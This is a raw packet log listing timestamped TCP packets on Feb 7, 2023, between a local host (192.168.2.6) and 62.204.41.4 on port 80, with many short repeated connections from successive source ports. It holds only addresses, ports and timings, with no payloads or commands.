Feb 7, 2023 20:01:26.446230888 CET	49853	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.507756948 CET	80	49853	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.507986069 CET	49853	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.521596909 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.582315922 CET	80	49854	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.582604885 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.635793924 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.696433067 CET	80	49854	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.700578928 CET	80	49854	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.700764894 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.872890949 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.873693943 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.933696985 CET	80	49854	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.933870077 CET	49854	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.936014891 CET	80	49855	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:26.936269045 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:26.978024006 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:27.040384054 CET	80	49855	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:27.043203115 CET	80	49855	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:27.043423891 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:27.267931938 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:27.268908978 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:27.329408884 CET	80	49856	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:27.329654932 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:27.330357075 CET	80	49855	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:27.330480099 CET	49855	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.475142002 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.538610935 CET	80	49856	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.542397022 CET	80	49856	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.542606115 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.774847984 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.775707006 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.835865974 CET	80	49856	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.836107969 CET	49856	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.837337017 CET	80	49857	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.837582111 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.881944895 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:28.944277048 CET	80	49857	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.947046995 CET	80	49857	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:28.947166920 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.060564041 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.061522007 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.122833967 CET	80	49857	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.122942924 CET	49857	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.124100924 CET	80	49858	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.124310970 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.126523972 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.190675020 CET	80	49858	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.194288015 CET	80	49858	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.194377899 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.311167002 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.312261105 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.375128031 CET	80	49858	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.375159979 CET	80	49859	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.375250101 CET	49858	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.375312090 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.375750065 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.437225103 CET	80	49859	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.442006111 CET	80	49859	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.442117929 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.559793949 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.560481071 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.622036934 CET	80	49859	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.622174978 CET	49859	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.622447968 CET	80	49860	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.622540951 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.628066063 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.689563036 CET	80	49860	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.692550898 CET	80	49860	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.692653894 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.816756964 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.819359064 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.879190922 CET	80	49860	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.879375935 CET	49860	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.881000996 CET	80	49861	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.881227016 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.882531881 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:29.944051027 CET	80	49861	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.945761919 CET	80	49861	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:29.945938110 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.060503006 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.061285973 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.123641968 CET	80	49861	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.123781919 CET	49861	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.124860048 CET	80	49862	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.125050068 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.125467062 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.187098980 CET	80	49862	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.190821886 CET	80	49862	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.194760084 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.310647964 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.311567068 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.372525930 CET	80	49862	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.372767925 CET	49862	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.372955084 CET	80	49863	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.373210907 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.373661995 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.435141087 CET	80	49863	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.437711000 CET	80	49863	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.437897921 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.544140100 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.545022964 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.605539083 CET	80	49864	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.605703115 CET	80	49863	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.605916977 CET	49863	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.606750965 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.634610891 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.695158005 CET	80	49864	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.697523117 CET	80	49864	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.697700024 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.810357094 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.811131954 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.871299982 CET	80	49864	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.871776104 CET	80	49865	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.871854067 CET	49864	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.871951103 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.873059034 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:30.933865070 CET	80	49865	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.936146021 CET	80	49865	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:30.936579943 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.048255920 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.049043894 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.108695984 CET	80	49866	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.108850956 CET	80	49865	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.109045982 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.109062910 CET	49865	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.109834909 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.169347048 CET	80	49866	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.173635960 CET	80	49866	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.173904896 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.279246092 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.279970884 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.338947058 CET	80	49866	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.339188099 CET	49866	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.341573000 CET	80	49867	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.341813087 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.342485905 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.404161930 CET	80	49867	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.406632900 CET	80	49867	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.406838894 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.536312103 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.537369013 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.597923040 CET	80	49868	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.597960949 CET	80	49867	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.598257065 CET	49867	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.598757029 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.598757029 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.659370899 CET	80	49868	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.661962032 CET	80	49868	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.662260056 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.779592991 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.780776978 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.840300083 CET	80	49868	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.840415955 CET	49868	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.842215061 CET	80	49869	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.842446089 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.842864037 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:31.904400110 CET	80	49869	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.907516003 CET	80	49869	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:31.907723904 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.015360117 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.016506910 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.077353001 CET	80	49869	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.077429056 CET	80	49870	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.077567101 CET	49869	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.077702999 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.078335047 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.139137030 CET	80	49870	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.142682076 CET	80	49870	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.142890930 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.276966095 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.278486013 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.337630987 CET	80	49870	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.337790012 CET	49870	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.341481924 CET	80	49871	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.341638088 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.342194080 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.403517962 CET	80	49871	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.405644894 CET	80	49871	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.405832052 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.535531998 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.536211967 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.597006083 CET	80	49871	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.597121000 CET	49871	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.598479986 CET	80	49872	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.598732948 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.599241018 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.661453009 CET	80	49872	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.663626909 CET	80	49872	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.663721085 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.784466028 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.785907030 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.846818924 CET	80	49872	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.846893072 CET	49872	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.847301006 CET	80	49873	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.847387075 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.847820044 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:32.909351110 CET	80	49873	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.911439896 CET	80	49873	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:32.911674023 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.043566942 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.044599056 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.105276108 CET	80	49874	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.105328083 CET	80	49873	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.105597019 CET	49873	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.106040955 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.109252930 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.170200109 CET	80	49874	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.173959970 CET	80	49874	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.174177885 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.278400898 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.279244900 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.338949919 CET	80	49874	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.339133024 CET	49874	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.340790033 CET	80	49875	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.340971947 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.341459990 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.402749062 CET	80	49875	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.405076027 CET	80	49875	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.405255079 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.517421961 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.518374920 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.578967094 CET	80	49875	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.579740047 CET	80	49876	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.579878092 CET	49875	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.579955101 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.586090088 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.647861958 CET	80	49876	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.649971008 CET	80	49876	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.650259018 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.765575886 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.772423983 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.827034950 CET	80	49876	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.827260971 CET	49876	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.832048893 CET	80	49877	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.832353115 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.832947016 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:33.892494917 CET	80	49877	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.894639015 CET	80	49877	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:33.897166014 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.014250040 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.016196012 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.073832989 CET	80	49877	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.074069977 CET	49877	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.079479933 CET	80	49878	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.079766989 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.080303907 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.142870903 CET	80	49878	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.146358967 CET	80	49878	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.146537066 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.272444010 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.273413897 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.335002899 CET	80	49879	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.335202932 CET	80	49878	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.335270882 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.335345984 CET	49878	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.335803986 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.397248983 CET	80	49879	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.399455070 CET	80	49879	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.399713993 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.535152912 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.535939932 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.597707987 CET	80	49879	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.597914934 CET	49879	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.598517895 CET	80	49881	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.598675966 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.599060059 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.661405087 CET	80	49881	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.663373947 CET	80	49881	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.663542986 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.809849977 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.811661005 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.872019053 CET	80	49882	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.872143984 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.872481108 CET	80	49881	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.872561932 CET	49881	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.875626087 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:34.935913086 CET	80	49882	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.938281059 CET	80	49882	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:34.938399076 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.045419931 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.046731949 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.106745958 CET	80	49882	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.106960058 CET	49882	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.109222889 CET	80	49883	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.109386921 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.109836102 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.172056913 CET	80	49883	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.175904036 CET	80	49883	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.176204920 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.279098988 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.280320883 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.341485977 CET	80	49883	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.341658115 CET	49883	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.342669964 CET	80	49884	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.342828989 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.347764015 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.411479950 CET	80	49884	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.413851976 CET	80	49884	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.414088011 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.531476974 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.532805920 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.592546940 CET	80	49885	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.592839956 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.593496084 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.593657017 CET	80	49884	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.593784094 CET	49884	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.652903080 CET	80	49885	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.655714989 CET	80	49885	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.655936956 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.771351099 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.772528887 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.831223965 CET	80	49885	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.831336975 CET	49885	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.831954956 CET	80	49886	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.832092047 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.832637072 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:35.892030001 CET	80	49886	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.894501925 CET	80	49886	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:35.894644976 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.025329113 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.028526068 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.085056067 CET	80	49886	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.085165024 CET	49886	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.090131044 CET	80	49887	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.090272903 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.097176075 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.159029007 CET	80	49887	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.162766933 CET	80	49887	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.162858963 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.290956020 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.291929960 CET	49888	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.352550983 CET	80	49887	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.352634907 CET	49887	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.353212118 CET	80	49888	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.353315115 CET	49888	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.353709936 CET	49888	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:36.416671991 CET	80	49888	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.418462038 CET	80	49888	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:36.418569088 CET	49888	80	192.168.2.6	62.204.41.4
